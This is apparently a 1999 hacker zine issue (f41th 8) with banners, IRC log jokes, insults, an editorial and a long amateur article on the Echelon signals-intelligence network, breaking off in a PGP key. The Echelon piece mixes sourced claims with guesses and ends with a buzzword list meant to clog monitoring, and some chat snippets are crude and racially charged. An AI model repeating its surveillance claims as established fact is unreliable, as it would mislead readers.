f41th Issue 08

21 Aug 2020
  

________ _______________ ____ __.______________.___.________ ________
\______ \ / | \______ \ |/ _|\_ ___ \__ | |\______ \ \_____ \
| | \ / | || _/ < / \ \// | | | | \ _(__ <
| ` \/ ^ / | \ | \ \ \___\____ | | ` \/ \
/_______ /\____ ||____|_ /____|__ \ \______ / ______|/_______ /______ /
\/ |__| \/ \/ \/\/ \/ \/
_______________________________ ____________________ __________________
\______ \______ \_ _____// _____/\_ _____/ \ \__ ___/
| ___/| _/| __)_ \_____ \ | __)_ / | \| |
| | | | \| \/ \ | \/ | \ |
|____| |____|_ /_______ /_______ //_______ /\____|__ /____|
\/ \/ \/ \/ \/


[ http://darkcyde.phunc.com ]
[ mailto: hybrid@dtmf.org ]

yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|

+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+ +-+ +-+-+-+-+ +-+-+-+-+
|F|4|1|T|H| |M|4|G|G|A|Z|I|N|E| |I|S|S|U|E| |8| |J|U|L|Y| |1|9|9|9|
+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+ +-+ +-+-+-+-+ +-+-+-+-+

E I G H T

f41th is a production of D4RKCYDE (C)
#darkcyde EFnet


"you are approaching Y2K at 3600 seconds per hour"
EIGHT-E wikkid


<antifire> ch1ckie: so what?
<ch1ckie> so fuck off and stay outta my channel
*** antifire was kicked by ch1ckie (bewm)
*** ch1ckie sets mode: +b *!*@werd.nac.net

Fuck w1t h3r, and f33l her wr4th!!!!!!


-----------------------------------------------------------------------------
OOO-(z}-|[ F41th 8 Editorial ]--( z0mba )--{z)-|[OOO
OOO-(z}-|[ Echelon - an In-depth(ish) look ]--( Warchild )--{z)-|[OOO
OOO-(z}-|[ Echelon - continued research ]--( hybrid )--{z)-|[OOO
OOO-(z}-|[ SprintNet Local Access Tel. No's ]--( redshadow )--{z)-|[OOO
OOO-(z}-|[ AT&T Conferencing Information ]--( redshadow )--{z)-|[OOO
OOO-(z}-|[ Computer Virii ]--( [JaSuN] )--{z)-|[OOO
OOO-(z}-|[ Network Programming ]--( z0mba )--{z)-|[OOO
OOO-(z}-|[ USRobotics Netserver/8 ]--( hybrid )--{z)-|[OOO
OOO-(z}-|[ Views on hacking, past and present ]--( shiloh )--{z)-|[OOO
OOO-(z}-|[ ACTS advanced communications ]--( lowtek )--{z)-|[OOO
OOO-(z}-|[ Some Mi6 employee list, submited ]--( anon )--{z)-|[OOO
OOO-(z}-|[ HELLASPAC ]--( monty )--{z)-|[OOO
OOO-(z)-|[ UK Various O8OO scans ]--( force )--(z)-|[OOO
OOO-(z)-|[ IRC logz - bonus force logz! ]--( hmm )--(z)-|[OOO
OOO-(z)-|[ Intro to hacking with NFS ]--( msinister )--(z)-|[OOO
OOO-(z)-|[ US 18OO pocket scan ]--( anon )--(z)-|[OOO
OOO-(z)-|[ Cisco Router IP routing ]--( wiz )--(z)-|[OOO
OOO-(z)-|[ Introduction to IP addressing ]--( wiz )--(z)-|[OOO
OOO-(z)-|[ UK O8OO scanz ]--( trionix )--(z)-|[OOO
OOO-(z)-|[ Network Programing ]--( zomba )--(z)-|[OOO
OOO-(z)-|[ Signalling from phone to exchange ]--( shadowx )--(z)-|[OOO
-----------------------------------------------------------------------------


[03:10] <KaTKilla> HERE COMES THE KAT KILLER
[03:10] <KaTKilla> THE KAT KILLER THATS ME

41n't n0th1n 4s s4t1sfy1ng 4s bl0w1ng y0ur 0wn trump3t


" But the Echelon system is a whole new critter; it doesn't monitor
the communications of just Saddam Hussein and his merry men, or
the post-Soviet purveyors of glow-in-the-dark explosives - nope,
the Echelon system keeps an eye on everybody. "


---Party Line Civil Liberties, February 10, 1998


-----------------------------------------------------------------------------
D4RKCYDE Staff...


[ zomba ]------[ iTs aLl in THe tEqniq ] * http://darkcyde.phunc.com
[ hybrid ]------[ inHumAn eRRor ] * #darkcyde efnet (no lamerz)
[ downtime ]------[ ThE mAn frOm UnCLe ] * D4RKCYDE COMMUNICATIONS
[ force ]------[ ThE HuMAN tOnElOck ] * 1997--1998--1999--WhyTOOkay
[ shadowx ]------[ SliM SHaDy ] * ----------------------------
[ msinister ]------[ dOnt mEss wIt hIm ] * All material/publications
[ shylock ]------[ DIgital pImp ] * [c] D4RKCYDE 1997,1998,1999.
[ lowtek ]------[ SkOOling sAtPStn ] * ----------------------------
[ bodie ]------[ ThE zOmbie ] * hybrid@dtmf.org (submissions)
[ sintax ]------[ ThE mAn fRom DelMoNtE ] * zomba@etc.phunc.com (mail)
[ microwire ]------[ WhATs GoING On mAn ] * find us on the pstn bitch...

"Once you're owned, youre probably going to be owned for quite a long
time."
--- elite h4xwh0rE

-----------------------------------------------------------------------------
SHOUTZ (werd to the following ppl, creatures, non-terestrial entitys)

[ 9x ][ b4b0 ][ med ][ mobsters ][ phunc ][ dtmf.org ][ knight ][ substance ]
[ ch1ckie ][ gr1p ][ t1p ][ gb ][ jorge ][ vixen ][ loco ][ red-led ][ xio ]
[ lusta ][ port ][ extriad ][ aktiver ][ asshair ][ jennicide ][ oeb ] [ s- ]
[ siezer ][ infidel ][ klaus-floride ][ chimmy ][ darkcyde ][ gossi ][ cab ]
[ oclet ][ pbxphreak ][ dave ][ wirepair ][ digiphreq ][ gov-boi ][ henk ]
[ devious ][ prez ][ katkilla ][ vaxenboy ][ simmeth ][ voltage ][ dgtlfokus ]


FUCK YOUZ (that means we pitty your lameness)

[ atoi ][ PLUK ][ atoi ][ mrsp00n ][ armageddon ][ anti-social mag ][ atoi ]

P L E -- fuck you for giving us shouts without our authorisation.
PhoneLosers of the UK, PhoneLosers England.. you put the 4 in l4me.

THOUGHT

If a lamer has 5 lame brain cells and loses two of them, does the fact
that he now has only 3 lame brain cells make him any less of a lamer?
-----------------------------------------------------------------------------

*** Now talking in #b4b0
<tip> the black dick is a myth.
<icesk> tip: i know heh
<tip> it retains more blood when non-erect, thus it may seem larger.
<tip> BUT
<tip> erect, all penises are the same length.
<tip> don't ask me why
<tip> er
<tip> don't ask me how i know this.

So thats how b4b0 come up with such a kewl zine :]


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Editorial ]::::::::::::[OO--[ by z0mba ]---[ zomba@addicts.org ]:::
-->[OO]:::::::::::::::::::::::::::::::[ http://members.xoom.com/phuk ]:::::::

* z0mba has returned. Gone 4hrs 57mins 23secs
[03:18] «ø» Nothing was logged while you were away.

And that ladies and gentlemen, is how popular I am on IRC. Oh well, i'll
just go off quetly and throw myself off a bridge or summit. I guess your all
wondering why the hell i'm doing the editorial and not hybrid, and the truth
is that hybrid has decided that I am way leeter than him and therefore should
be in control of f41th (HEH, i'm full o d4 sh1t). Okay, so maybe hybrid just
wanted a rest okay, geez, stop hassling me about it. If you think that i've
done a crap job at compiling/editing this issue then send all your flames to
z0mba@fuckyou.co.uk and i'll be sure to reply to every last one of them. I'd
also just like to add that f41th 8 is the *biggest* issue ever, which just
about puts at the top of the zine writing community, in laymans terms, we
0wn.

So whats happened since f41th 7? erm..not much to be honest, an article
appeared on bbc.co.uk claiming a huge hacker-crackdown was about to happen
in the UK, but as of now, I know of no-one that has been raided so i'm
guessing that was all bollox. Oh yeah, one last thing, a_kitten was
unanomously voted sexiest bird on EFnet by D4RKCYDE (go to barby.org to see
for yourself). The huge DC voting panel of me and hybrid came to this
conclusion whilst sitting around bored fuckless. Okay so thats about it, so
lets get on w1t d1s sh1t.

Big shout to hybrids dog, so far this month its scratched my cellphone,
pissed on bodie (LOL) and bitten my ankles/hands/shoes/knees/arms etc, etc.

[22:43] <ginger> ZOMBA OWNS MY LAME ASS!
She's come to her senses, its only a matter of time before you all do!

---------------------------------------------------------------
The raiders hit early this morning, banging the door about 4 AM,
me groggily peeking out, a subpoena wadded into my shirt,
grinning like shit, saying you're fucked this time
Johnny Wee-dick
---------------------------------------------------------------


" you are now a Script Kiddy .. enjoy your new life of stupidity... "
--- DrHamstah


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Echelon ]::::::::::::::::::::[OO--[ by Warchild (aka Polymorph ]:::
-->[OO::::::::::::::::::::::::::::::::::::::[ w4rch1ld@phreaker.net ]::::::::

___________________________________________________________
õõõõõõõ[ Format: ]õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ
===========================================================
õõõõõõõõõ[ Introduction ]õõõõõõõõõ
õõõõõõõõõ[ Background ]õõõõõõõõõ
õõõõõõõõõ[ Interception Methods and capabilities ]õõõõõõõõõ
õõõõõõõõõ[ Station Details ]õõõõõõõõõ
õõõõõõõõõ[ Defeation ]õõõõõõõõõ
===========================================================
õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+++++++++++++++++++
| Introduction: |
+++++++++++++++++++

I'll start off by basically defining what Echelon is. Echelon is what many
people have thought and feared existed for many years. Why else would the
governments protest against strong public encryption if they weren't spying
on us? Project Echelon is a project, thought up and run, by the US NSA
(National Security Agency) with a little backup from the CIA (Central
Intelligence Agency). What Echelon does is intercept as much
telecommunications data as possible to search for data which may be of
interest to them. This is done by tapping into the telecommunications
network and searching for key data such as words, names and telephone
numbers.

As for the reason I have written this. Basically, I've always been highly
interested in what the secret services are up to. I first heard of Echelon
about a year ago, and then completely forgot about it again until I read
Antidote 5 (www.thepoison.org/antidote) which quoted an article from
www.theage.com about Echelon. After that I started researching it and soon
realised that information on it was not too readily available, especially not
all in one place and is often incomplete. Thus, I thought I may as well
write up what I find to bring as much of the information I can right to your
screen for anyone who is interested.


+++++++++++++++++
| Background: |
+++++++++++++++++

After the Cold War, the NSA wanted to be able to spy on the world. However,
unlike many of the projects set up during the cold war, Echelon was not
targeted at military information, (although some is intercepted in the
pacific), rather the interception of terrorism, weapons proliferation and
economic intelligence. The first generation of Echelon went by the name
"Project P415". (Incidentally, we are now in the second generation of
Echelon).

During 1946-1947 the UK, Australia, New Zealand and Canada created the
commonwealth SIGINT (Signals Intelligence) organisation under leadership of
GCHQ (Government Communication Headquarters - Cheltenham, UK). Later in 1947,
the US and the UK signed the UKUSA agreement, with the other SIGINT countries
joining automatically due to their alliance with the UK via the Commonwealth
SIGINT agreement. This was the formal creation of the UKUSA SIGINT
community.

Initially, the size of the Echelon system was quite small with only 2 bases
intercepting traffic (or at least satellite traffic) and specifically build
for the Echelon project. One base was in Morwestow in Cornwall (UK),built in
1972, and the other at Yakima, Washington (US), built in 1971. The Echelon
network which connects the 2 countries is a large, private WAN using TCP/IP
and is known by the name "Platform". While the UK and the US were the only
countries actually intercepting anything, Canada, Australia and New Zealand
were responsible for analysing particular data.

In the late 70's, with the launch of new Intelsat satellites, more bases were
required to maintain global interception capabilities. Thus, 2 more bases
were built, once again, one by GCHQ and the other by the NSA. GCHQ built one
in Hong Kong, which was dismantled in 1994 ready for the hand over. The
NSA's second base was build in Sugar Grove, West Virginia, and collects
intelligence from civilian satellites.

Plans for Australia, Canada and New Zealand to build interception stations
were made in 1989. It is thought, and there is no evidence concerning this,
that these plans were made when these countries introduced new computer
systems. This however seems a bit strange to me though as why are 3
different countries all upgrading their computer systems at the same time?

An echelon interception station was built in New Zealand at Waihopai, near
Blenheim, South Island and has the codename 'Flintlock'. Waihopai's task is
to monitor two Pacific communications satellites and intercept all
communications from and between the South Pacific islands.

Information on the base in Canada is particularly scarce. It is located in
Leitrium, Ontario and has 4 satellite receiving dishes.

An old base, which is located at Shoal Bay in the Northern Territory -
Australia became the first Australia Echelon station and has 9 satellite
receivers locked into regional communications satellites.

The second Australian station was built in 1994 and is situated in Kojarena,
near Geraldton, in Western Australia. The station has a only 4 satellite
receivers.

At some point, a station was also built in Puerto Rico. I had to get the
Atlas out for this one as I had no idea where the fuck that was, and then
discovered it's down in the Caribbean. Apparently it's US owned for some
reason though which explains how they managed to get one down there. I
suspect it monitors the islands, Columbia and Venezuela.

Now that you've got a brief history of how the project was developed and
expanded, let me explain how the system actually works.

Each interception station posses a computer known as a Dictionary. Each
SIGINT agency provides a "Watch List" of between 10 and 50 key words
(approximately) that are of interest to them that they wish to look for. This
list is not just a continuos list of words, rather a well organised list set
into categories, identified by a four digit, numeric code. These 4 digit
codes, in turn, translate to another code which identifies the type of data
it is. For example, Diplomatic data from France has the code FRD, similarly,
Economic data from Australia is given the code AUE. This is known as Standard
Case Notation. Unfortunately, I do not know any numeric equivalents! The
lists can include phone numbers, country names, personal names,
organisations, addresses (both land and email) as well as just general words.
Criteria can also be set so that only particular combinations are found. For
example e-mails from a particular address which also include another
specified word.

As each SIGINT member submits it's own list, each base has a total of 5
lists, one belonging to it's own SIGINT agency, and another 4, belonging to
each of the other UKUSA SIGINT members.

The software for the dictionary's, including necessary decryption software,
are provided by the NSA (what a surprise!).

An important distinction between interception and collection should be made
here. Interception is literally just that, the interception of the
communications data. Data which meets collection requirements, is then
recorded and collected. All data which does not meet collection requirements
is discarded at this point.

It is unclear as to the selection process as there is conflicting
information. Some sources claim only 1 match is required, however if this is
the case this would produce absolutely huge amounts of collected data which
does have to be sorted through manually. I can't see how the SIGINT agencies
would have the man power to do this however! Other sources have suggested
that multiple matches are required. I suspect it is a combination of both.
I.E a sequence of individual queries are run on the intercepted data to find
matches effectively. This way, some matches would only be counted if other
matches were also made, and others would just require one match.

When a match is made, a copy is made. The data required will vary depending
on the nature of the communication. For example, a collected email would be
recorded by means of the entire e-mail, along with the appropriate IP
addresses, times, etc. A telephone call would be recorded, and later
transcribed, with appropriate information such as CLID of the caller or it's
destination, duration, etc.

Depending on whose Watch List matches on a transmission were made will
determine where the information ends up. Dictionaries are completely
automated. Thus, people in the particular country where the interception is
made and the Dictionary located, do not get told what matches are made
concerning other SIGINT agencies watch lists. Collected data is sent directly
to the appropriate agency via their private WAN mentioned earlier. Each
match transmission is also sent with the code name of the base at which it
was intercepted, as well as the numeric code of the category of the Watch
List matches.

The efforts of the echelon system are divided thus:

Australia's DSD - Eastern Indian Ocean, South West pacific and a small
portion of South East Asia intelligence.

UK's GCHQ - Central Europe, Africa and the Soviet Union east of the
Urals intelligence.

Canadian CSE - Northern Soviet Union and parts of Europe intelligence.

New Zealand's GCSB - South West Pacific (only a small portion)
intelligence.

USA's NSA - All remaining areas of interest's intelligence.

Each country also intercepts it's own traffic and interception equipment may
be owned by either that country or the NSA (e.g. Menwith Hill in Yorkshire).

On a side note, some satellite receivers are encased by domes called radomes.
These are there to protect the equipment both from whether which could damage
it, and to prevent it's exact angle from being seen (I.E. what it's pointing
at). Why some receivers are encased in radomes and others not I do not know!
Anyway, radomes look like huge golf balls and are really quit big.

The existence of the system has obviously been kept secret since the day it
was first thought up in a tucked away building in suburban Washington which
was until very recently the headquarters of the Special Collection Service of
the NSA. They've denied everything over the years, however all their lying
was made useless in late May when Martin Brady, director of the Defence
Signals Directorate in Canberra (Australia), came clean about it's existence.
When governments claim they do/did not know about it's existence, they're
probably not lying about that! When I say government, I mean government in
the sense of priminister and cabinet. Basically, anyone can become an MP.
All that is required is that you are of that nationality, and those who have
dual nationality are normally required to give up the other if they wish to
become an MP. Now imagine the vetting that takes place in order to become a
member of a security agency. I don't think I need explain further!

In 1983 Margaret Thatcher abused her powers by asking GCHQ to bug some
cabinet members phones to see if they were "on side". GCHQ, in turn, asked
CSE to do it so that they could deny involvement of it's agents. Thus, a
primeinister or president asking it's security agency to provide come '
intercepted economic data' seems just as likely. When Britain was trying to
see through its highly controversial deal to sell Hawk fighters and other
arms to Indonesia, staff at the Office of National Assessments feared that
the British would pass DSD intelligence on East Timor to President Soeharto
in order to win the lucrative contract.


++++++++++++++++++++++++++++++++++++++++++++
| Interception Methods and Capabilities: |
++++++++++++++++++++++++++++++++++++++++++++

The capabilities of Echelon have in some circumstances been over exaggerated
when they have been written about in the past. It is still unclear as to
exactly what volume of the worlds traffic is intercepted, and even more
unclear how it is done. While researching this I found both disturbing
information and stuff which made me realise that Echelon is not such a threat
as people thought, or, at least, not such a threat to the general public
(what ever they happened to be doing that is illegal) as some people thought.
I'll explain interception methods in no particular order.

Special nuclear submarines were constructed by the US Navy specifically for
part of Project Echelon. A lot of international traffic travels via undersea
cables as it takes up too much bandwidth to bounce every international call
off a satellite, and there is really no need! Thus, this is where a lot of
traffic is intercepted. These cables are extremely deep, and the Americans
are the only ones *known* to have the capabilities to do what I am about to
describe. Once these cables are laid, they don't exactly get much attention!
The telephone companies certainly don't have the equipment to go down there
to fuck about with them, and thus placing a bug down there has a very low
chance of being found. This is done by placing a 'pod' next to the cables
which pick up leaked radio emissions. These pods have a reasonably long life
(between 1-2 years) and thus do not need changing that often. The submarines
where designed so that placing and retrieval of a pod could be done via
machinery, meaning no one was ever needed outside the sub to help. Because
the pods go next to the cables, no damage is ever caused, and would only ever
be found, ordinarily, when the cable is to be replaced. This method has one
problem though, which is that they obviously don't work on phiber optic
cables as it does not radiate any emissions. This was a bit of a problem,
and no way was devised to intercept the transmissions on phiber optics. How
long they spent trying to find a way I do not know, probably not *too* long
as they knew another method was at their disposal. Where do the undersea
cables go when they come out of the water? Onto the phone network, and are
transmitted in the usual fashion of microwave repeaters. This is where
interception on undersea phiber optic cables takes place, the point at which
the cable comes out of the water and is hooked up to a microwave repeater.

National calls are transmitted up and down the country via microwave
repeaters. These are those towers with dishes on and send the signal to each
other. Because microwave travels in a straight line, all the towers must be
in line with each other, otherwise the signal will be lost. The reason why
microwave repeaters are needed is a bit sketchy! (This is where certain
people on IRC realise why I was asking about this a week or so back! :) ).
Repeaters will definitely be needed because of the earth's curvature,
however, whether they are also used to boost the signal or not no one seems
to know. Logic would suggest that some of the signal will be lost on it's
way from tower to tower, and thus it would need boosting. This however
conflicts a bit with some other information. When a signal is repeated, some
of the signal misses it because of the earth's curvature and some of the
signal passes on into outer space.

Microwave is great because unlike HF radio waves, they are not bounced back
by the atmosphere but instead pass straight through it. An extremely poor
diagram attempts to show this below. The signal is being sent from tower to
tower with the angle being corrected each time to counter the curvature of
the earth. The signal which misses the repeater, passes on by and providing
it doesn't go hitting too many obstacles, passes into outer space. This is
where our friendly SIGINT organisation place a satellite to intercept the
signal, and bounce it down directly to somewhere else. Please do not
misunderstand what I mean when I say bounce. I don't mean it literally
reflects the signal back. What will happen is the signal will be intercepted
by the satellite, cleaned up and amplified, encrypted and then sent to a base
such as Mewith Hill.


microwave
________________________|-------/
/\ /\ /\`\,_ |~~~~~~~\ Satellite
************** /\ /
******************** /New signal for SIGINT
********[ Earth ]********** / Organisation


Apologies for my poor asci skills, it's not particularly each to draw that in
a limited amount of space but I'm sure you all get the idea anyway. It seems
surprising that these signals would be strong enough to pass out into space,
but it is apparently what happens. When a SIGINT organisation can not get a
building erected near one of the microwave repeaters of an undersea phiber
cable, this is the method that is used to intercept the traffic. If they are
able to get a building near by, they simply tap directly into the towers
signal. A lot of the time, this is not actually necessary. This method is
used when the UKUSA SIGINT community want to intercept national traffic from
a country of interest when they have no other choice.

Repeaters are required every 30 - 50 km.

Some countries hand the traffic directly over, and this is where many of you
won't be the slightest bit surprised! Hmm, what countries do you think hand
all their traffic straight over to the appropriate SIGINT organisation
(regardless of whether or not they realise that it actually for use also in
Echelon, as well as any other reason.)? Surprise surprise, the UK and the
USA. The USA I don't know anything about, whether only certain telcos pass
it on or whether they all do and why. In the UK, as far as I am aware, only
BT do. However, seeing as BT is the largest Telco in the UK and the majority
of traffic from other telcos are going to pass through BT equipment at one
time or another, this does not really cause any problems. This does in fact
have greater implications than you may have immediately realised. Not only
does this include all national traffic, but all international traffic from,
to and passing through either the US or the UK. I.E. A fax from Spain to
Ireland is going to pass through the UK, and thus the call has automatically
been intercepted. This makes life much easier in making Echelon work!

The last method of interception is from the satellites, and that is what some
of those wonderful large satellite receivers are doing. Most of the worlds
international calls which need to be bounced off satellites use the Intelsats
which sit above the equator. Traffic is intercepted from these normally by
satellite receivers in radomes, possibly due to the size of the things (and
they really are huge!)

There is a separate chain of interception stations which intercept HF radio,
however I know very little about this and is of no real interest to me as I
expect that only particular channels are watched and the amount of useful
data which can be obtained from HF as part of the Echelon network is rather
limited.

"So, how does electronic data such as e-mails, etc get intercepted?" I hear
you ask. Let me first begin with what isn't. Web pages! Web pages are
public access (the majority of the time) and thus important processing time
would be being wasted if every web page was also checked for words of
interest. Pages of interest are located in other fashions, but lets face it,
there are really very few pages on the web that are really of much interest
to them! Sites of interest are monitored by visiting each day by a bot. The
bot searches for new files and updates and takes copies of what it finds.
Sites which are known to be checked in this way are particular sites
promoting powerful free encryption. (You can find out if your site is
watched by simply looking at you logs. If the same government (or possibly
even none government) IP address connects every day at the same time, then
you know you are!). But really, very few pages are monitored!

Usenet is also not monitored as part of Echelon. This too is public and
would waste time, especially as there is so much crap on Usenet. Everyone
knows Usenet is monitored, both by the governments and by organisations, a
lessons some people in alt.ph.uk still don't seem to have learned (fuckwits).
For example, in the UK, the Defence Evaluation and Research Agency maintains
a 1 terabyte data base of the previous 90 days of Usenet posts and is
searched daily for information of interest. They *do not care* about kidi
pr0n or what twat in alt.ph.uk is posting 0800 Internet dial-ups. That is
not their job! They are looking for *intelligence* , it's up to other
organisations to care about that kind of stuff, often the organisation it
involves.

What is intercepted is e-mail, faxes and telexes. These are then run through
the dictionary's just like all other intercepted data.

A system known as N-Gram is in place which works out the topic of a
communication (such as an e-mail) by looking at provided documents, reading
over them and deciding what key words are present, etc. This is the learning
phase. It is then used by comparing what it 'knows' to other communications,
looking for the key words and deciding what the topic is. While you may
think that this would be a bit unreliable, it has in fact been proven to be
very effective.

Internet traffic is intercepted in a number of ways. A large volume passes
through the satellites, but this is a secondary method. Most interception
takes place when it enters the US (and possibly the UK), or when it reaches
major Internet exchanges. The odds are pretty high that it'll pass through
the US at one time or another due to the way routing is done, so it's really
pretty easy.

I will now put your mind at rest a bit. While I believe the dictionary's can
look for particular voices (although it must be very rarely done), there is
no effective word spotting system in existence! Instead, particular phone
numbers are flagged and related information is recorded and traffic analysis
is in place.

Incidentally, pager and mobile phone traffic are also intercepted.

There is also another network which has been said is linked to the Echelon
network which specifically targets Russian communications. This includes
countries which are not part of the UKUSA SIGINT community though so how that
is run I do not know. The base at Pine Gap near Alice Springs in Central
Australia (which has 12 radomes!) is said to be apart of this, picking up
information sent down to it by American spy satellites.

There was some discussion somewhere (not named to prevent attention from
being drawn to it) about the type of computers used. It was claimed that
NORAD were using computers much more powerful than Cray's and that the
dictionary's were also likely to be of a similar power in order to cope with
the shear volume of data. It is however thought that Cray's *are* used after
all. How many I simply don't know! If I remember correctly (which I may
well not do as it was 1996), at that time the most number of Cray's any
single site had that *didn't* belong to the government was 3. Thus, Cray's
are certainly used by the government. Perhaps they're not quite as
technologically advanced concerning processing power as one may have thought!


+++++++++++++++++++++
| Station Details |
+++++++++++++++++++++

The completeness of this list I do not know and is only aimed as the main
Echelon stations.


United Kingdom:

Menwith Hill in Yorkshire, mentioned previously, was constructed in 1955 and
has run many projects in the past. It has continually grown in size and
mainly run by NSA members. If you ever wanted to see a loaded gun at close
range and pointing at you, hang around the gates for a bit! The NSA are very
rude and impatient! If you're interested in further Menwith Hill info mail m
e and i'll sort something out as i have loads on it. It runs over 250
projects, of which I know of about 10 ish.

As previously mentioned, there is also a base in Morwestow in Cornwall. This
was one of the first Echelon stations and was built especially in 1972! I
think is has about 9 radomes now and once again has a large proportion of NSA
people working there.

Last December I managed to find some of GCHQ, - Cheltenham's satellite
receivers. There is a dictionary at one of the 2 GCHQ sites in Cheltenham,
although I do not know which. Presumably these satellite receivers are
hooked straight up to Cheltenham, but what they are intercepting I don't
know! None were in radomes though and there were about 8 or 9 of them.

The last dictionary in Britain is located in London itself! The building
owned by GCHQ and located in Westminster and intercepts all Telex traffic,
to, from or passing through London. While it is controlled by GCHQ it is
operated by security vetted BT employees. Something I forgot to say earlier
was how BT got into all this. Back in the days of the Post Office
controlling the phone network, it was of course government owned (as the post
office still is). Back then, when wire taps were in place it was Post Office
employees in an MI5 building in London that did all of the transcribing! As
the Post Office had been working for the government for years, by the time
the telephone section was privatised and BT came along they presumably had a
little chat and just followed on where the Post Office had left off! Thus, of
course, BT and GCHQ, along with MI5 and MI6, have always had a very "chummy"
relationship! Hmmm, wonder what BT gets out of this?

No code names have been found for any of the bases and all intercept
satellite traffic apart from London.


Australia:

Ahh, Australia, my favourite country. Australia's main contribution to the
Echelon project is an ultra-modern intelligence base in Kojarena, near
Geraldton in Western Australia. The station was built in the early 1990s
and has a mere 4 satellite receivers.

The second Australian station is an older, larger base, however not so
technologically advanced. It is located at Shoal Bay in the Northern
Territory and has 9 satellite receivers locked into regional communications
satellites.

Both stations are occupied by both NSA members and Australians, however the
number of people present at each station I do not know. I suspect the base
in the west is relatively empty as it's modern and quite small. Probably just
a few dozen technicians, and some armed guards, but don't quote me on that.
The Shoal Bay station is likely to participate in other projects of it's own
so a much higher population is expected. I have been unable to find out
either of the bases code names.


New Zealand:

New Zealand runs an Echelon satellite interception site at Waihopai, near
Blenheim, South Island and has the codename 'Flintlock'. Waihopai's task is
to monitor two Pacific communications satellites and intercept all
communications from and between the South Pacific islands. This base is
rather small in comparison with the others and has only 2 radomes. The fact
that this base is so small probably is probably one of the reasons that it is
unmanned (with the exception of sleeping guards).


United States of America:

The NSA have a base at Yakima, Washington which has 9 radomes. Seeing as
it's on their own soil and the NSA like to have their fingers everywhere i
suspect that the base has a large population and probably has quite a few
people working there. Yakima has the codename 'Cowboy'.

A US Navy-run (as in they claim it's for the Navy. Just like the base at
Mewith hill is supposedly an RAF base) satellite receiving station is also
at Sugar Grove, West Virginia, and collects intelligence from civilian
satellites. It has 6 Radomes.

There is also a base in Puerto Rico. I had to get the Atlas out for this
one as i had no idea where the fuck that was, and then discovered it's down
in the Caribbean. Apparently it's US owned though for some reason which
explains how they managed to get one down there. I suspect it monitors the
islands, Columbia and Venezuela.

A base that I have zero information on is one in Washington state, 200km
south west of Seattle.

I have no idea what any of the other code names are.


Canada:

Canada have a satellite interception station at Leitrim, near Ottawa, Ontario
which has 4 satellite receivers. No further information on this has come to
light.


+++++++++++++++
| Defeation |
+++++++++++++++

There's not really all that much that can be done. British phone calls have
been tapped for 40 years, and it took until May for confirmation of Echelon's
existence. Their is a campaign to close Menwith Hill however i find it
extremely surpassing if they got it. They may however manage to stop it
growing any bigger. This too is what the European Parliament want to happen
(have NSA building requests to expand it rejected). The best thing to do is
block the system up with crap by adding a list of buzz words to e-mails.
Obviously don't do it on sensitive shit or using an account provided by your
employer but general stuff is fine.

Encrypting e-mails will obviously prevent 'them' from finding the buzz words
unless of course they have decryption capabilities built into the
dictionary's using back doors (such as that implemented in the Clipper
Chip) otherwise your transmission will just flow as if Echelon didn't exist
but that's not the point. Basically, if you're talking about really dodgy
stuff, you use your common sense and meet face to face in a crowded place
like a foot ball match or something.

Adding the list below to your e-mails should get it intercepted although it
won't really waste any of their time as when the SIGINT employee comes
to look at it they will immediately see it's just a time waster and discard
it. A function may have also been built into the dictionary's to discard
interceptions which have matches, but have matches in say 3 entirely
unrelated categories. Anyway, I would have thought that this list would meet
at least 1 of the Watch List words:

SILKWORTH, conspiracy, Allah, DSD, ARABSAT, MOONPENNY, bomb, assassinate,
aeroplane, nuclear weapons, atomic, plutonium, NSA, GCHQ, weapons grade,
president, USA, infiltrate, double agent, vengeance, MI5, MI6, conceal, gun,
execute, eliminate, suicide bomber, white house, pentagon, white sands,
dreamland, freedom ridge, CIA, ASIS, ASIO, DOD, Spy, FBI, venona, project
disseminate, operation blue bird, lights in the sky, Big Bird, encounter,
alien, illegal, Cuban, Chinese, Russian, sympathiser, explode, chemical
warfare, sleeper, government, embassy

As a last word, i was contacted by a number of members of the government
while researching this who had heard in one way or another what i was
doing. Where in the world these people were i will not disclose however
all claimed that they were/had been members of a UKUSA SIGINT community
member. I do not question their positions, however i must admit that some of
their knowledge of Echelon seemed either some what limited, or were
attempting to play it down.

Well, that's it. I may have missed some bits out and there will obviously be
mistakes in there for which I apologies, but I have limited resources /
sources. Feel free to send any comments or corrections to me, and if you
have further info, send away!

Warchild (aka Polymorph)
#2600-uk

w4rch1ld@phreaker.net
warchild@dangerous-minds.com

This article may not be reproduced, in part or in whole, without the prier
consent of the author. (In other words just get in contact with me).

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDXfYxMRBADnmgdRPnZxbWkRcMssec1MWdMRttWocPrwbHnu3MXxtjHTrLeB
O03wWwOLFFziNhAPSYVzVGoS4orLNIWpIKKD5cHlbDTHtSGHX7mXDQHZIOLugWgn
q1s5L7RmiO8zsg/6DS2RQBoaLGjJSk13JbZbrir8Ewrvz3+nOnCbI9zalwCg/6ow
FaR7xI5h3sPd+rnSmrs7BrUEAMV4PuzQjcZ8CwJajn1yw2PCs96sqj99ZjA0y0hY
EUJALsUkZ5SQjOLRmzkTmmNK8qmwKmZ8/dPXzPgDXq4QTK338GDEeK1b0MnzwtXl
